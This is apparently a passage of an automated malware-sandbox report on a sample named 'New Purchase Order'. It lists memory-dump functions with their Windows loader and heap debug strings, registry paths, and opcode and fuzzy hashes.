                  • Part of subcall function 01812DF0: LdrInitializeThunk.NTDLL ref: 01812DFA
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01810BA3
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01810BB6
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01810D60
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01810D74
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                • String ID:
                • API String ID: 1404860816-0
                • Opcode ID: a8e97f5424a73a4358402485c98d4b0012f98d210e55f57069c330b7c2f4bed7
                • Instruction ID: 725e59e3c5bd6e7008c813963255086403446b9e3602464233663258df519827
                • Opcode Fuzzy Hash: a8e97f5424a73a4358402485c98d4b0012f98d210e55f57069c330b7c2f4bed7
                • Instruction Fuzzy Hash: B4425F76900719DFDB21CF28C840BAAB7F9FF48314F1445A9E989DB245DB70AA84CF61
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                • API String ID: 0-379654539
                • Opcode ID: 951d0ac2a45e3ce64a67e8bee2b112ac3b893bdcfc8b123318e9bfe247643d30
                • Instruction ID: 90339fdb64d326b3ae54b9ec4297dbd961a07ccc7f9b9bfcf77ff1e75bb73c66
                • Opcode Fuzzy Hash: 951d0ac2a45e3ce64a67e8bee2b112ac3b893bdcfc8b123318e9bfe247643d30
                • Instruction Fuzzy Hash: 83C1697510838ACFD711CF58C044B6AB7F4BF84704F0489AAF996CB255E734DA4ACBA2
                Strings
                • minkernel\ntdll\ldrinit.c, xrefs: 01808421
                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0180855E
                • @, xrefs: 01808591
                • LdrpInitializeProcess, xrefs: 01808422
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                • API String ID: 0-1918872054
                • Opcode ID: 112b522e0300cfc1e109025b136f4ddd3ef57034190e24e644f16a8b44e45bcc
                • Instruction ID: 85c9f9957d946ff797bfb9efb9ee315e17fb913ee333e28746313eb46ae99a20
                • Opcode Fuzzy Hash: 112b522e0300cfc1e109025b136f4ddd3ef57034190e24e644f16a8b44e45bcc
                • Instruction Fuzzy Hash: 34919E71508749AFE722DF65CC81EABBAECBF89744F40092EF684D2195E730DA44CB52
                Strings
                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018422B6
                • .Local, xrefs: 018028D8
                • SXS: %s() passed the empty activation context, xrefs: 018421DE
                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018421D9, 018422B1
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                • API String ID: 0-1239276146
                • Opcode ID: 9f6ca3a8f1e369330c2edc3b58179a74be4a0db8b86976d5f44b850d5b093e24
                • Instruction ID: 6beb8abea679f5daaaaf3913a653aba8cb9c5b0af4cbff6c90653681160d0fc9
                • Opcode Fuzzy Hash: 9f6ca3a8f1e369330c2edc3b58179a74be4a0db8b86976d5f44b850d5b093e24
                • Instruction Fuzzy Hash: 6DA1B13590022D9BDB66CF68DC88BA9B7B6BF58354F1441E9E908E7291D7709F80CF90
                Strings
                • RtlDeactivateActivationContext, xrefs: 01843425, 01843432, 01843451
                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01843456
                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01843437
                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0184342A
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                • API String ID: 0-1245972979
                • Opcode ID: b11edeec3a24de0c6fa1509cca91961bf52b98be9215595f16fe80faa22e0c61
                • Instruction ID: cf076c10e61f3d41288b64a334eb5df46c98a9ed000c47b64b895600b6cfd3ca
                • Opcode Fuzzy Hash: b11edeec3a24de0c6fa1509cca91961bf52b98be9215595f16fe80faa22e0c61
                • Instruction Fuzzy Hash: 29612672640B1A9BD723CF1CC891B6AB7E5FFA0B50F148519EE55DB281CB30EA41CB91
                Strings
                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018310AE
                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01830FE5
                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01831028
                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0183106B
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                • API String ID: 0-1468400865
                • Opcode ID: 77f7e3dfa060dba90671552c1cb3285363aaf1204e2c74e4f032096ee4bbca96
                • Instruction ID: 18536e09284054216c9be672a3c36bdfcca8257be9c7d8b7bef581b87e1c7cba
                • Opcode Fuzzy Hash: 77f7e3dfa060dba90671552c1cb3285363aaf1204e2c74e4f032096ee4bbca96
                • Instruction Fuzzy Hash: 9471D2B19043099FCB21DF18C884B9BBFA9EF95764F540468F9498B24AD734D6C8CBD2
                Strings
                • apphelp.dll, xrefs: 017F2462
                • LdrpDynamicShimModule, xrefs: 0183A998
                • minkernel\ntdll\ldrinit.c, xrefs: 0183A9A2
                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0183A992
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                • API String ID: 0-176724104
                • Opcode ID: 5ec33cff8cf4030134c0f0ba19603a49379e183a111b1f1e77944bae61b67ead
                • Instruction ID: 9c46732aaaecb57ad4c470b73188c0ecd5935b991b324b8a1a6178079674831f
                • Opcode Fuzzy Hash: 5ec33cff8cf4030134c0f0ba19603a49379e183a111b1f1e77944bae61b67ead
                • Instruction Fuzzy Hash: CA313572A00201AFDB359F5D9885ABABBB5FBC0B04F29406DE950E7345D7B09B42CB80
                Strings
                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 017E327D
                • HEAP[%wZ]: , xrefs: 017E3255
                • HEAP: , xrefs: 017E3264
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                • API String ID: 0-617086771
                • Opcode ID: 18e7a58c45b84d6319a6814a412a8d65329212d7a1eedbc4d621670ffbe1dc1b
                • Instruction ID: 46cf24c25fde5643f41970d29fcbd8f25a06ca4bbc96ec8f5972b8f2c6eee937
                • Opcode Fuzzy Hash: 18e7a58c45b84d6319a6814a412a8d65329212d7a1eedbc4d621670ffbe1dc1b
                • Instruction Fuzzy Hash: 5792BD71A046499FEB25CF68C448BAEFBF5FF48300F188099E959AB392D735A941CF50
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                • API String ID: 0-4253913091
                • Opcode ID: bc919dac12b06bf190528f0b220d9329fc9566e274a57d7b8583b1c3e2ff2da4
                • Instruction ID: 871ae6b16bbc5ef441b4f4dab3321d323320f66dd190b280494d35129d76da29
                • Opcode Fuzzy Hash: bc919dac12b06bf190528f0b220d9329fc9566e274a57d7b8583b1c3e2ff2da4
                • Instruction Fuzzy Hash: 79F18B70700606DFEB25CF68C898B6AF7F5FB88304F1841A8E556DB385D774AA81CB91
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: $@
                • API String ID: 0-1077428164
                • Opcode ID: 08bb6d8ebdcc87d4ee68aca06bf14751efa69a10c12eb44f8d9af09b20102bc4
                • Instruction ID: 370839221f5d0c809cdd9665ef5d0fbf8c59a46626fe2fc279d15542106a8009
                • Opcode Fuzzy Hash: 08bb6d8ebdcc87d4ee68aca06bf14751efa69a10c12eb44f8d9af09b20102bc4
                • Instruction Fuzzy Hash: 0AC25C716083419FEB29CF28C841BABFBE5AF88714F04896DFA89D7341D734D9458B92
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: FilterFullPath$UseFilter$\??\
                • API String ID: 0-2779062949
                • Opcode ID: 5ce5e1468482c9ee1f19307cceffa7fab7131495a041c3950ae779c6c76ba18f
                • Instruction ID: 674fe861b1c696b2adf89a14c2159ccc0ca4655a21370e1c54c2248525ba49ca
                • Opcode Fuzzy Hash: 5ce5e1468482c9ee1f19307cceffa7fab7131495a041c3950ae779c6c76ba18f
                • Instruction Fuzzy Hash: 09A13C719116399BDB229B68CC88BAEB7B9EF44710F1041E9DA09E7250D7359FC4CF50
                Strings
                • LdrpCheckModule, xrefs: 0183A117
                • Failed to allocated memory for shimmed module list, xrefs: 0183A10F
                • minkernel\ntdll\ldrinit.c, xrefs: 0183A121
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                • API String ID: 0-161242083
                • Opcode ID: c06d2c9e01f6ba784e01d0fa52054cba5cec7d69d86530bfe4a0490681b16e46
                • Instruction ID: 1c0a139f46e718d5779cd9750cc84b39baba32cf7e5521263dae0de9fe7f9111
                • Opcode Fuzzy Hash: c06d2c9e01f6ba784e01d0fa52054cba5cec7d69d86530bfe4a0490681b16e46
                • Instruction Fuzzy Hash: 5271BB71A002059FDB29DF68C985BBEF7F5EB84704F18406DEA42E7356E634AA41CB81
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                • API String ID: 0-1334570610
                • Opcode ID: dc84b77b294265dcae5bf7fdcb1fe1477e7311b96df5c8e5638fea6c3e2ec766
                • Instruction ID: 3e0fc326a6a59bccf73e0298f71f79b19f128d088ccf62d36749c44d337837eb
                • Opcode Fuzzy Hash: dc84b77b294265dcae5bf7fdcb1fe1477e7311b96df5c8e5638fea6c3e2ec766
                • Instruction Fuzzy Hash: 5B616C707003059FDB29CF28C888B6AFBE5FF49704F188599E459CB296D7B0E981CB91
                Strings
                • Failed to reallocate the system dirs string !, xrefs: 018482D7
                • minkernel\ntdll\ldrinit.c, xrefs: 018482E8
                • LdrpInitializePerUserWindowsDirectory, xrefs: 018482DE
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                • API String ID: 0-1783798831
                • Opcode ID: 5e3e0ce0fe42213e2d1f5b147c3d24a9feca8d130271c35786fdc8e5363f394f
                • Instruction ID: 29a9135d5f3840571756d0af9edc8644566f3c2d22cdb8d70284f7a2a4cf8b2a
                • Opcode Fuzzy Hash: 5e3e0ce0fe42213e2d1f5b147c3d24a9feca8d130271c35786fdc8e5363f394f
                • Instruction Fuzzy Hash: EA41E4B1544309AFC722EF6CDC48B5BB7E8EF48754F104A6AF944D3295EB70DA008B91
                Strings
                • PreferredUILanguages, xrefs: 0188C212
                • @, xrefs: 0188C1F1
                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0188C1C5
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                • API String ID: 0-2968386058
                • Opcode ID: 4b86c40a97fb99d0bda84d7c5872a5106e33e6842192f08cceca66491e42a1aa
                • Instruction ID: b7d75ceb9d69d3ec98190a7e3b0396271731734047108d559c84b640ead10bab
                • Opcode Fuzzy Hash: 4b86c40a97fb99d0bda84d7c5872a5106e33e6842192f08cceca66491e42a1aa
                • Instruction Fuzzy Hash: 6E416272A00219EBDB11EAD8C895FEEBBB8AB54704F14416AE609F7284D7749B44CB60
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                • API String ID: 0-1373925480
                • Opcode ID: 794ac189471dd637eff2fd39360cc1bf586577416dcf7adefe6f7ebc4b878668
                • Instruction ID: 3035b421d691819514b56174e22b18e32c7a22730be6b3c6b73b116ab1f0d93c
                • Opcode Fuzzy Hash: 794ac189471dd637eff2fd39360cc1bf586577416dcf7adefe6f7ebc4b878668
                • Instruction Fuzzy Hash: FF413432A00648CBEB26DBE9C844BADBBFDFF55344F24045ADA01EB781DB358A41CB11
                Strings
                • minkernel\ntdll\ldrredirect.c, xrefs: 01854899
                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01854888
                • LdrpCheckRedirection, xrefs: 0185488F
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                • API String ID: 0-3154609507
                • Opcode ID: 88f8b80bb76349c9d81a18ad7c88bb0731fa37053f393b7fa3f47d8b4ee5e04f
                • Instruction ID: 1dfadcafc4037cd1500415f6c4a346eb2e904fcb6413b527b9b5ea03dc6d6117
                • Opcode Fuzzy Hash: 88f8b80bb76349c9d81a18ad7c88bb0731fa37053f393b7fa3f47d8b4ee5e04f
                • Instruction Fuzzy Hash: E941F236A042559FCBA1CE2DD840A26BBE4FF89B54F06066DED48D7311F731EA80CB81
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                • API String ID: 0-2558761708
                • Opcode ID: 28d47169e6aa3ca9ea555ba45ffb736b1ef4f5c4bfbed832aaff8ceef635104f
                • Instruction ID: 1dc05f5333da453d04da1150f1fb4934229cbbd1952d3da6af9b03b986c8b8d9
                • Opcode Fuzzy Hash: 28d47169e6aa3ca9ea555ba45ffb736b1ef4f5c4bfbed832aaff8ceef635104f
                • Instruction Fuzzy Hash: 0D11DCB1314102DFDB2DDA18C899B6AF3E4EF84B1AF18816DF406CB255DB70E941C791
                Strings
                • minkernel\ntdll\ldrinit.c, xrefs: 01852104
                • Process initialization failed with status 0x%08lx, xrefs: 018520F3
                • LdrpInitializationFailure, xrefs: 018520FA
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                • API String ID: 0-2986994758
                • Opcode ID: 479575a4543021ce836316820146b9057b22d4e9d8a192b17b155e88de66f722
                • Instruction ID: 89e892586f8d799259fcb9d75b1343f0949d1764a73b5c3460c66690e0350e06
                • Opcode Fuzzy Hash: 479575a4543021ce836316820146b9057b22d4e9d8a192b17b155e88de66f722
                • Instruction Fuzzy Hash: 24F0C275680748BFE724E64DDC56FDA7769FB40B54F540069FA00AB286DAB0BB00CA91
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: #%u
                • API String ID: 48624451-232158463
                • Opcode ID: a333961571e2970837bc67cecef485f85cf9b4d56d84d915988e7c165ba540d4
                • Instruction ID: 289d1c503e140239780ede4333fd7dcc6c981cb03f27f573601f179426c48eee
                • Opcode Fuzzy Hash: a333961571e2970837bc67cecef485f85cf9b4d56d84d915988e7c165ba540d4
                • Instruction Fuzzy Hash: 68714971A0014A9FDB01DFA8C994FAEB7F8FF48704F144065E905E7251EA34EE41CBA1
                Strings
                • LdrResSearchResource Exit, xrefs: 017DAA25
                • LdrResSearchResource Enter, xrefs: 017DAA13
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                • API String ID: 0-4066393604
                • Opcode ID: 2c101bcd62d75fefb845f7fecc420954d2d350e7e1e5bdea2bcc1352a78533a0
                • Instruction ID: c03aca5edd1b2391bed0d8644ab5133e648256a0f7a6b6e772ef18c847919d3c
                • Opcode Fuzzy Hash: 2c101bcd62d75fefb845f7fecc420954d2d350e7e1e5bdea2bcc1352a78533a0
                • Instruction Fuzzy Hash: 57E18F71A0021DAFEB22CF98C980BAEFBBABF94310F144566ED01E7251D7749A41CB51
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: `$`
                • API String ID: 0-197956300
                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                • Instruction ID: 4f0af97c8f1dd4bdc7df49a205b66cc396c1733a28986a73a6db4298164343f0
                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                • Instruction Fuzzy Hash: 83C1C3312043469BEB29CF28C845B6BBBE5BFC4318F184A2DF696C7291D775D605CB82
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID: Legacy$UEFI
                • API String ID: 2994545307-634100481
                • Opcode ID: c6829bb13e9e6d7659df5aad1882cbc8221c496676b2de4a30da872eb0793f56
                • Instruction ID: 31ade37f74386be67be2dafbb75c86b2957df036f3796f39ce61960eb1fb6503
                • Opcode Fuzzy Hash: c6829bb13e9e6d7659df5aad1882cbc8221c496676b2de4a30da872eb0793f56
                • Instruction Fuzzy Hash: 5A615E71E0031D9FEB15DFA8C840BADBBB9FB48704F54406DE649EB251DB35AA00CB50
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: @$MUI
                • API String ID: 0-17815947
                • Opcode ID: 557f6fdedddb8872cfddc146d58cc8dfe012390d675534bc09cf3255c47b8b2b
                • Instruction ID: 6f81f6072f5dc845dd0d013ce70ba92182b9a60a047cff6a7fc34c3b1fb5fec5
                • Opcode Fuzzy Hash: 557f6fdedddb8872cfddc146d58cc8dfe012390d675534bc09cf3255c47b8b2b
                • Instruction Fuzzy Hash: FA5107B1E0021DAEDB11DFA9CC84AEEBBBDEB48754F100529E611F7294D7309A45CB60
                Strings
                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 017D063D
                • kLsE, xrefs: 017D0540
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                • API String ID: 0-2547482624
                • Opcode ID: 8594278cd48478c818caf22f08dd89e1702b1379e8e4e46e40249bd8cb58d226
                • Instruction ID: 1192086a0967aafd97b65daa31b6e92244d5f85baa1f73309cf16d95dd6291ea
                • Opcode Fuzzy Hash: 8594278cd48478c818caf22f08dd89e1702b1379e8e4e46e40249bd8cb58d226
                • Instruction Fuzzy Hash: C051AC7150474A8FD724EF28C444AA7FBF4AF84314F24583EFAAA87241E770D545CBA2
                Strings
                • RtlpResUltimateFallbackInfo Enter, xrefs: 017DA2FB
                • RtlpResUltimateFallbackInfo Exit, xrefs: 017DA309
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                • API String ID: 0-2876891731
                • Opcode ID: b99216c2e03c85c7475293dfaa2b15e1b566e9b5e9371f89e3b72534cd06199b
                • Instruction ID: 81719a24dceb63af4a48224a341ba2028937857010a61b463511dda1231519ad
                • Opcode Fuzzy Hash: b99216c2e03c85c7475293dfaa2b15e1b566e9b5e9371f89e3b72534cd06199b
                • Instruction Fuzzy Hash: B941B131A04649DBDB15CF5DC844B6EBBF6FF85704F2840A9E900DB291EBB5DA40CB90
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID: Cleanup Group$Threadpool!
                • API String ID: 2994545307-4008356553
                • Opcode ID: e556f63ea5bfb5d4c4101e9b98508dd8e9cb047d5689ad205ec2c9a02cfa6358
                • Instruction ID: 44463e895dd5beb86a76dd7c0d67d143f0ba8ef85861b9b52d07e8aa9b6af25c
                • Opcode Fuzzy Hash: e556f63ea5bfb5d4c4101e9b98508dd8e9cb047d5689ad205ec2c9a02cfa6358
                • Instruction Fuzzy Hash: 7001D1B2240708AFD352DF14CD45F2677F8EB85B15F018939A658CB190E334DA04CB46
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: MUI
                • API String ID: 0-1339004836
                • Opcode ID: fe69640791552b9979754f966a0b27ab339f7b09b9558d2037f88c5101776590
                • Instruction ID: a3d2947250474db326745020d7b17bebba0e03b3c7aea5c56d933742cc2dd280
                • Opcode Fuzzy Hash: fe69640791552b9979754f966a0b27ab339f7b09b9558d2037f88c5101776590
                • Instruction Fuzzy Hash: C2825B75E0021D8FEB25CFA9C980BEDFBB5BF48310F1481A9E959AB395D7309981CB50
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID: 0-3916222277
                • Opcode ID: 46b36055f677547c1a898fe9f45cb42c0d81f0766164552a5b1ae7db66e6500c
                • Instruction ID: fe1976b26e595833fbe772eafa619b60f13a76e6f1edf79a270ddc9500c951a8
                • Opcode Fuzzy Hash: 46b36055f677547c1a898fe9f45cb42c0d81f0766164552a5b1ae7db66e6500c
                • Instruction Fuzzy Hash: 8A917372940219AFEB21DB95CC85FAEBBB8EF18754F600055F700EB295E674AE00CB60
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID: 0-3916222277
                • Opcode ID: 957986af8a9bcdf78a2f35536372b33a5474b2b185f23f1b095b1a83ec262189
                • Instruction ID: 4b912e8661e60db5fce23328fc8ef52db0b81cb73bc5b4d97c6e20535ae1e597
                • Opcode Fuzzy Hash: 957986af8a9bcdf78a2f35536372b33a5474b2b185f23f1b095b1a83ec262189
                • Instruction Fuzzy Hash: 7891A072900609BEDB22AFA9DC84FAFBBB9EF45744F100069F505E7251EB34DA01CB91
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: GlobalTags
                • API String ID: 0-1106856819
                • Opcode ID: 302543a3e277a53e6a5f9eb18125658180fb6f2035a053ed0eabaaff085bafff
